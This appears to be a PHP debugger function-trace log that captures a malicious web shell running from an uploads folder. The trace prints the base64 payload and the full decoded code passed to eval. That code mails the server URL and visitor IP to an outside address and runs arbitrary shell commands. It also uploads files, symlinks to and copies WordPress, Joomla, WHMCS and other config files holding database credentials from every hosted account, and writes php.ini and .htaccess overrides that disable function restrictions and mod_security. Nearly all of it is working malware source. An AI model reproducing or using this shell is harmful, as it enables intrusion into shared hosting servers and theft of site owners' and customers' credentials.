Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 20:21:07.289809] 1 0 1 0.000155 393512 1 3 0 0.000347 448792 {main} 1 /var/www/html/uploads/titit.php 0 0 1 A /var/www/html/uploads/titit.php 88 $code = 'QGluaV9zZXQoJ291dHB1dF9idWZmZXJpbmcnLCAwKTsNCkBpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIDApOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnNjRNJyk7DQpoZWFkZXIoJ0NvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04Jyk7DQokdHVqdWFubWFpbCA9ICdzYXR5YWFqaTE5NDVAZ21haWwuY29tJzsNCiR4X3BhdGggPSAiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KJHBlc2FuX2FsZXJ0ID0gImZpeCAkeF9wYXRoIDpwICpJUCBBZGRyZXNzIDogWyAiIC4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gLiAiIF0iOw0KbWFpbCgkdHVqdWFubWFp' 2 4 0 0.000425 448792 base64_decode 0 /var/www/html/uploads/titit.php 89 1 'QGluaV9zZXQoJ291dHB1dF9idWZmZXJpbmcnLCAwKTsNCkBpbmlfc2V0KCdkaXNwbGF5X2Vycm9ycycsIDApOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnNjRNJyk7DQpoZWFkZXIoJ0NvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04Jyk7DQokdHVqdWFubWFpbCA9ICdzYXR5YWFqaTE5NDVAZ21haWwuY29tJzsNCiR4X3BhdGggPSAiaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOw0KJHBlc2FuX2FsZXJ0ID0gImZpeCAkeF9wYXRoIDpwICpJUCBBZGRyZXNzIDogWyAiIC4gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gLiAiIF0iOw0KbWFpbCgkdHVqdWFubWFp' 2 4 1 0.000606 502072 2 4 R '@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'satyaaji1945@gmail.com\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\nset_time_limit(0);\r\n' 2 5 0 0.001625 707568 eval 1 '@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'satyaaji1945@gmail.com\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\n//function\r\nfunction ambilKata($param, $kata1, $kata2){\r\n if(strpos($param, $kata1) === FALSE) return FALSE;\r\n if(strpos($param, $kata2) === FALSE) return FALSE;\r\n $start = strpos($param, $kata1) + strlen($kata1);\r\n $end = strpos($param, $kata2, $start);\r\n $return = substr($param, $start, $end - $start);\r\n return $return;\r\n}\r\nif(get_magic_quotes_gpc()) {\r\n function idx_ss($array) {\r\nreturn is_array($array) ? array_map(\'idx_ss\', $array) : stripslashes($array);\r\n }\r\n $_POST = idx_ss($_POST);\r\n}\r\n\r\nfunction exe($cmd) {\r\n if(function_exists(\'system\')) { \r\n@ob_start(); \r\n@system($cmd); \r\n$buff = @ob_get_contents(); \r\n@ob_end_clean(); \r\nreturn $buff; \r\n } elseif(function_exists(\'exec\')) { \r\n@exec($cmd,$results); \r\n$buff = ""; \r\nforeach($results as $result) { \r\n $buff .= $result; \r\n} return $buff; \r\n } elseif(function_exists(\'passthru\')) { \r\n@ob_start(); \r\n@passthru($cmd); \r\n$buff = @ob_get_contents(); \r\n@ob_end_clean(); \r\nreturn $buff; \r\n } elseif(function_exists(\'shell_exec\')) { \r\n$buff = @shell_exec($cmd); \r\nreturn $buff; \r\n }\r\n}\r\n\r\n//check dir\r\n$nick = "k0v3T";\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$software = getenv("SERVER_SOFTWARE");\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\n\r\n////////////////////////////////////////\r\n\r\nif(!function_exists(\'posix_getegid\')) {\r\n $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n} else {\r\n $uid = @posix_getpwuid(posix_geteuid());\r\n $gid = @posix_getgrgid(posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n} \r\n//uname\r\necho "
Current Dir : ";\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'/\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'\'.$pat.\'/\';\r\n}\r\n\r\n##TOOLBAR\r\necho "
\r\n
\r\nHome\r\nUpload\r\nCommand\r\nConfig\r\nJumping\r\n

\r\n\r\nSymlink\r\nBypass Disable Function\r\n\r\n

\r\n
";\r\n\r\n//uploads\r\nif($_GET[\'a\'] == \'upload\') {\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'Berhasil Upload gan!
\';\r\n}else{\r\necho \'Gagal Upload Gan
\';\r\n}\r\n}\r\necho \'
\r\nUpload File :
\r\n\r\n
\r\n\';\t\r\n\r\n\r\n} elseif($_GET[\'a\'] == \'configv2\') {\r\n\t\t\tif(strtolower(substr(PHP_OS, 0, 3)) == "win"){\r\necho \'\';\r\nexit;\r\n}\r\n\tif($_POST){\tif($_POST[\'config\'] == \'symvhosts\') {\r\n\t\t@mkdir("k0v3T_symvhosts", 0777);\r\nexe("ln -s / k0v3T_symvhosts/root");\r\n$htaccess="Options Indexes FollowSymLinks\r\nDirectoryIndex k0v3T.htm\r\nAddType text/plain .php \r\nAddHandler text/plain .php\r\nSatisfy Any";\r\n@file_put_contents("k0v3T_symvhosts/.htaccess",$htaccess);\r\n\t\t$etc_passwd=$_POST[\'passwd\'];\r\n \r\n $etc_passwd=explode("\\n",$etc_passwd);\r\nforeach($etc_passwd as $passwd){\r\n$pawd=explode(":",$passwd);\r\n$user =$pawd[5];\r\n$jembod = preg_replace(\'/\\/var\\/www\\/vhosts\\//\', \'\', $user);\r\nif (preg_match(\'/vhosts/i\',$user)){\r\nexe("ln -s ".$user."/httpdocs/wp-config.php k0v3T_symvhosts/".$jembod."-Wordpress.txt");\r\nexe("ln -s ".$user."/httpdocs/configuration.php k0v3T_symvhosts/".$jembod."-Joomla.txt");\r\nexe("ln -s ".$user."/httpdocs/config/koneksi.php k0v3T_symvhosts/".$jembod."-Lokomedia.txt");\r\nexe("ln -s ".$user."/httpdocs/forum/config.php k0v3T_symvhosts/".$jembod."-phpBB.txt");\r\nexe("ln -s ".$user."/httpdocs/sites/default/settings.php k0v3T_symvhosts/".$jembod."-Drupal.txt");\r\nexe("ln -s ".$user."/httpdocs/config/settings.inc.php k0v3T_symvhosts/".$jembod."-PrestaShop.txt");\r\nexe("ln -s ".$user."/httpdocs/app/etc/local.xml k0v3T_symvhosts/".$jembod."-Magento.txt");\r\nexe("ln -s ".$user."/httpdocs/admin/config.php k0v3T_symvhosts/".$jembod."-OpenCart.txt");\r\nexe("ln -s ".$user."/httpdocs/application/config/database.php k0v3T_symvhosts/".$jembod."-Ellislab.txt"); \r\n}}}\r\nif($_POST[\'config\'] == \'symlink\') {\r\n@mkdir("k0v3T_symconfig", 0777);\r\n@symlink("/","k0v3T_symconfig/root");\r\n$htaccess="Options Indexes FollowSymLinks\r\nDirectoryIndex k0v3T.htm\r\nAddType text/plain .php \r\nAddHandler text/plain .php\r\nSatisfy Any";\r\n@file_put_contents("k0v3T_symconfig/.htaccess",$htaccess);}\r\nif($_POST[\'config\'] == \'404\') {\r\n@mkdir("k0v3T_sym404", 0777);\r\n@symlink("/","k0v3T_sym404/root");\r\n$htaccess="Options Indexes FollowSymLinks\r\nDirectoryIndex k0v3T.htm\r\nAddType text/plain .php \r\nAddHandler text/plain .php\r\nSatisfy Any\r\nIndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*\r\nIndexIgnore *.txt404\r\nRewriteEngine On\r\nRewriteCond %{REQUEST_FILENAME} ^.*k0v3T_sym404 [NC]\r\nRewriteRule \\.txt$ %{REQUEST_URI}404 [L,R=302.NC]";\r\n@file_put_contents("k0v3T_sym404/.htaccess",$htaccess);\r\n}\r\nif($_POST[\'config\'] == \'grab\') {\r\n\t\t\t\t\t\tmkdir("k0v3T_configgrab", 0777);\r\n\t\t\t\t\t\t$isi_htc = "Options all\\nRequire None\\nSatisfy Any";\r\n\t\t\t\t\t\t$htc = fopen("k0v3T_configgrab/.htaccess","w");\r\n\t\t\t\t\t\tfwrite($htc, $isi_htc);\t\r\n}\r\n$passwd = $_POST[\'passwd\'];\r\n\r\npreg_match_all(\'/(.*?):x:/\', $passwd, $user_config);\r\nforeach($user_config[1] as $user_k0v3T) {\r\n$grab_config = array(\r\n"/home/$user_k0v3T/.accesshash" => "WHM-accesshash",\r\n"/home/$user_k0v3T/public_html/config/koneksi.php" => "Lokomedia",\r\n"/home/$user_k0v3T/public_html/forum/config.php" => "phpBB",\r\n"/home/$user_k0v3T/public_html/sites/default/settings.php" => "Drupal",\r\n"/home/$user_k0v3T/public_html/config/settings.inc.php" => "PrestaShop",\r\n"/home/$user_k0v3T/public_html/app/etc/local.xml" => "Magento",\r\n"/home/$user_k0v3T/public_html/admin/config.php" => "OpenCart",\r\n"/home/$user_k0v3T/public_html/application/config/database.php" => "Ellislab",\r\n"/home/$user_k0v3T/public_html/vb/includes/config.php" => "Vbulletin",\r\n"/home/$user_k0v3T/public_html/includes/config.php" => "Vbulletin",\r\n"/home/$user_k0v3T/public_html/forum/includes/config.php" => "Vbulletin",\r\n"/home/$user_k0v3T/public_html/forums/includes/config.php" => "Vbulletin",\r\n"/home/$user_k0v3T/public_html/cc/includes/config.php" => "Vbulletin",\r\n"/home/$user_k0v3T/public_html/inc/config.php" => "MyBB",\r\n"/home/$user_k0v3T/public_html/includes/configure.php" => "OsCommerce",\r\n"/home/$user_k0v3T/public_html/shop/includes/configure.php" => "OsCommerce",\r\n"/home/$user_k0v3T/public_html/os/includes/configure.php" => "OsCommerce",\r\n"/home/$user_k0v3T/public_html/oscom/includes/configure.php" => "OsCommerce",\r\n"/home/$user_k0v3T/public_html/products/includes/configure.php" => "OsCommerce",\r\n"/home/$user_k0v3T/public_html/cart/includes/configure.php" => "OsCommerce",\r\n"/home/$user_k0v3T/public_html/inc/conf_global.php" => "IPB",\r\n"/home/$user_k0v3T/public_html/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/wp/test/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/blog/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/beta/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/portal/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/site/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/wp/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/WP/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/news/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/wordpress/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/test/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/demo/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/home/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/v1/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/v2/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/press/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/new/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/blogs/wp-config.php" => "Wordpress",\r\n"/home/$user_k0v3T/public_html/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/blog/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/submitticket.php" => "^WHMCS",\r\n"/home/$user_k0v3T/public_html/cms/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/beta/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/portal/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/site/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/main/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/home/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/demo/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/test/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/v1/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/v2/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/joomla/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/new/configuration.php" => "Joomla",\r\n"/home/$user_k0v3T/public_html/WHMCS/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/whmcs1/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Whmcs/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/whmcs/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/whmcs/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/WHMC/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Whmc/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/whmc/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/WHM/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Whm/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/whm/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/HOST/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Host/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/host/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/SUPPORTES/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Supportes/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/supportes/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/domains/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/domain/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Hosting/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/HOSTING/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/hosting/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/CART/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Cart/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/cart/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/ORDER/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Order/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/order/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/CLIENT/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Client/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/client/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/CLIENTAREA/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Clientarea/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/clientarea/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/SUPPORT/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Support/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/support/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/BILLING/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Billing/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/billing/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/BUY/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Buy/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/buy/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/MANAGE/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Manage/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/manage/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/CLIENTSUPPORT/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/ClientSupport/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Clientsupport/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/clientsupport/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/CHECKOUT/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Checkout/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/checkout/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/BILLINGS/submitticket.php" => "WHMCS",\r\n"/home/$user_k0v3T/public_html/Billings/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/billings/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/BASKET/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Basket/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/basket/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/SECURE/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Secure/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/secure/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/SALES/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Sales/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/sales/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/BILL/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Bill/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/bill/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/PURCHASE/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Purchase/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/purchase/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/ACCOUNT/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Account/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/account/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/USER/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/User/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/user/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/CLIENTS/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Clients/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/clients/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/BILLINGS/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/Billings/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/billings/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/MY/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/My/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/my/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/secure/whm/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/secure/whmcs/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/panel/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/clientes/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/cliente/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/support/order/submitticket.php" => "WHMCS",\r\n"/home/$user_con7ext/public_html/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/boxbilling/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/box/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/host/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/Host/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/supportes/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/support/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/hosting/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/cart/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/order/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/client/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/clients/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/cliente/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/clientes/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/billing/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/billings/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/my/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/secure/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/support/order/bb-config.php" => "BoxBilling",\r\n"/home/$user_con7ext/public_html/includes/dist-configure.php" => "Zencart",\r\n"/home/$user_con7ext/public_html/zencart/includes/dist-configure.php" => "Zencart",\r\n"/home/$user_con7ext/public_html/products/includes/dist-configure.php" => "Zencart",\r\n"/home/$user_con7ext/public_html/cart/includes/dist-configure.php" => "Zencart",\r\n"/home/$user_con7ext/public_html/shop/includes/dist-configure.php" => "Zencart",\r\n"/home/$user_con7ext/public_html/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/hostbills/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/host/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/Host/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/supportes/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/support/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/hosting/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/cart/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/order/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/client/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/clients/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/cliente/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/clientes/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/billing/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/billings/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/my/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/secure/includes/iso4217.php" => "Hostbills",\r\n"/home/$user_con7ext/public_html/support/order/includes/iso4217.php" => "Hostbills"\r\n); \r\n\r\nforeach($grab_config as $config => $nama_config) {\r\n\tif($_POST[\'config\'] == \'grab\') {\r\n$ambil_config = file_get_contents($config);\r\nif($ambil_config == \'\') {\r\n} else {\r\n$file_config = fopen("k0v3T_configgrab/$user_k0v3T-$nama_config.txt","w");\r\nfputs($file_config,$ambil_config);\r\n}\r\n}\r\nif($_POST[\'config\'] == \'symlink\') {\r\n@symlink($config,"k0v3T_Symconfig/".$user_k0v3T."-".$nama_config.".txt");\r\n}\r\nif($_POST[\'config\'] == \'404\') {\r\n$sym404=symlink($config,"k0v3T_sym404/".$user_k0v3T."-".$nama_config.".txt");\r\nif($sym404){\r\n\t@mkdir("k0v3T_sym404/".$user_k0v3T."-".$nama_config.".txt404", 0777);\r\n\t$htaccess="Options Indexes FollowSymLinks\r\nDirectoryIndex k0v3T.htm\r\nHeaderName k0v3T.txt\r\nSatisfy Any\r\nIndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble\r\nIndexIgnore *";\r\n\r\n@file_put_contents("k0v3T_sym404/".$user_k0v3T."-".$nama_config.".txt404/.htaccess",$htaccess);\r\n\r\n@symlink($config,"k0v3T_sym404/".$user_k0v3T."-".$nama_config.".txt404/k0v3T.txt");\r\n\r\n\t}\r\n\r\n}\r\n\r\n } \r\n\t\t} if($_POST[\'config\'] == \'grab\') {\r\n echo "
Done
";\r\n\t\t}\r\n if($_POST[\'config\'] == \'404\') {\r\n echo "
\r\nSymlinkNya\r\n
Configurations
";\r\n }\r\n if($_POST[\'config\'] == \'symlink\') {\r\necho "
\r\nSymlinknya\r\n
Configurations
";\r\n\t\t\t}if($_POST[\'config\'] == \'symvhost\') {\r\necho "
\r\nRoot Server\r\n
Configurations
";\r\n\t\t\t}\r\n\t\t\r\n\t\t\r\n\t\t}else{\r\n echo "
\r\n\t\t



\r\n
\\n";\r\n}\r\n\r\n} elseif($_GET[\'a\'] == \'disablefunc\'){\r\n\t\techo "

";\r\n\t\techo "  ";\r\n\t\tif(isset($_POST[\'ini\']))\r\n{\r\n\t\t$file = fopen("php.ini","w");\r\n\t\techo fwrite($file,"disable_functions=none\r\nsafe_mode = Off\r\n\t");\r\n\t\tfclose($file);\r\n\t\techo "click here!";\r\n}\t\tif(isset($_POST[\'htce\']))\r\n{\r\n\t\t$file = fopen(".htaccess","w");\r\n\t\techo fwrite($file,"\r\nSecFilterEngine Off\r\nSecFilterScanPOST Off\r\n\r\n\t");\r\n\t\tfclose($file);\r\n\t\techo "htaccess successfully created!";\r\n} if(isset($_POST[\'litini\'])){\r\n\t\t$iniph = \'\';\r\n\t\t\t $byph = "safe_mode = Off n disable_functions= ";\r\n\t\t$comp="PEZpbGVzICoucGhwPg0KRm9yY2VUeXBlIGFwcGxpY2F0aW9uL3gtaHR0cGQtcGhwNA0KPC9GaWxlcz4=";\r\n\t\tfile_put_contents("php.ini",base64_decode($byph));\r\n\t\tfile_put_contents("ini.php",base64_decode($iniph));\r\n\t\tfile_put_contents(".htaccess",base64_decode($comp));\r\n\t\techo "";\r\n\t\techo"
";\r\n}\r\n\r\n}\r\nelseif($_GET[\'a\'] == \'symlink\') {\r\n$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $path);\r\n$d0mains = @file("/etc/named.conf");\r\n##httaces\r\nif($d0mains){\r\n@mkdir("k0v3T_sym",0777);\r\n@chdir("k0v3T_sym");\r\n@exe("ln -s / root");\r\n$file3 = \'Options Indexes FollowSymLinks\r\nDirectoryIndex k0v3T.htm\r\nAddType text/plain .php\r\nAddHandler text/plain .php\r\nSatisfy Any\';\r\n$fp3 = fopen(\'.htaccess\',\'w\');\r\n$fw3 = fwrite($fp3,$file3);@fclose($fp3);\r\necho "
\r\n\r\n\r\n\r\n\r\n\r\n\r\n";\r\n$dcount = 1;\r\nforeach($d0mains as $d0main){\r\nif(eregi("zone",$d0main)){preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\nflush();\r\nif(strlen(trim($domains[1][0])) > 2){\r\n$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));\r\necho "\r\n\r\n\r\n";\r\nflush();\r\n$dcount++;}}}\r\necho "
S. No.DomainsUsersSymlink
" . $dcount . "".$domains[1][0]."".$user[\'name\']."Symlink
